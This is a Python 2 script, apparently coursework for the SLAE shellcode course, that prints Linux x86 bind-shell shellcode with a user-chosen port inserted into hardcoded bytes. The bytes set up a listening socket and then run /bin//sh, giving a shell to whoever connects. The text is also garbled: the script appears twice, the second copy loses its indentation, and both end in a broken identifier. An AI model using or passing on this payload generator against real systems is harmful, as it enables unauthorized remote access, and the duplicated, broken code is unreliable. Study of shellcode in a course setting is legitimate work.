michaelnewton/bind-shell.py

## bind-shell.py
#!/usr/bin/env python

# Cut the shellcode apart at the point of the port declaration for assembly later.
shellcodefront = r"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x92\x43\x56\x66\x68"
shellcodeback = r"\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x57\x52\x89\xe1\xcd\x80\xb0\x66\x43\x57\x52\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"

while True:

	print "+------------------------------------+"
	print "|           Bind Shellcode           |"
	print "|    SLAE Assignment #1  SLAE-895    |"
	print "|        Generator Script 1.0        |"
	print "+------------------------------------+\n"

	portnum = raw_input("Enter the port number to bind to: ")

	port4x = format(int(portnum), '04x')     # Change the format of the input to hex bytes
	if port4x[0:2:] != "00" :                # Validate the first byte of the port is not null
		if port4x[2:4:] != "00" :              # Validate the second byte of the port is not null
			custom_port="\\x"+port4x[0:2:]+"\\x"+port4x[2:4:]  # Format the bytes as per our shellcode format
			print "Port number to inject: "+custom_port+"\n"
			print "Here is your shellcode:\n"
			print shellcodefront+custom_port+shellcodeback+"\n"
			if int(portnum) <= 1024 :           # Check if port is lower than 1024 and issue a warning
				print "Remember you need to be root to open this port!\n\n"
			break
	print "Invalid port chosen, port number " +portnum+ " creates a NULL byte, try another port greater than "+portnu m
	#!/usr/bin/env python

	# Cut the shellcode apart at the point of the port declaration for assembly later.
	shellcodefront = r"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x92\x43\x56\x66\x68"
	shellcodeback = r"\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x57\x52\x89\xe1\xcd\x80\xb0\x66\x43\x57\x52\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"

	while True:

	print "+------------------------------------+"
	print "\| Bind Shellcode \|"
	print "\| SLAE Assignment #1 SLAE-895 \|"
	print "\| Generator Script 1.0 \|"
	print "+------------------------------------+\n"

	portnum = raw_input("Enter the port number to bind to: ")

	port4x = format(int(portnum), '04x') # Change the format of the input to hex bytes
	if port4x[0:2:] != "00" : # Validate the first byte of the port is not null
	if port4x[2:4:] != "00" : # Validate the second byte of the port is not null
	custom_port="\\x"+port4x[0:2:]+"\\x"+port4x[2:4:] # Format the bytes as per our shellcode format
	print "Port number to inject: "+custom_port+"\n"
	print "Here is your shellcode:\n"
	print shellcodefront+custom_port+shellcodeback+"\n"
	if int(portnum) <= 1024 : # Check if port is lower than 1024 and issue a warning
	print "Remember you need to be root to open this port!\n\n"
	break
	print "Invalid port chosen, port number " +portnum+ " creates a NULL byte, try another port greater than "+portnu m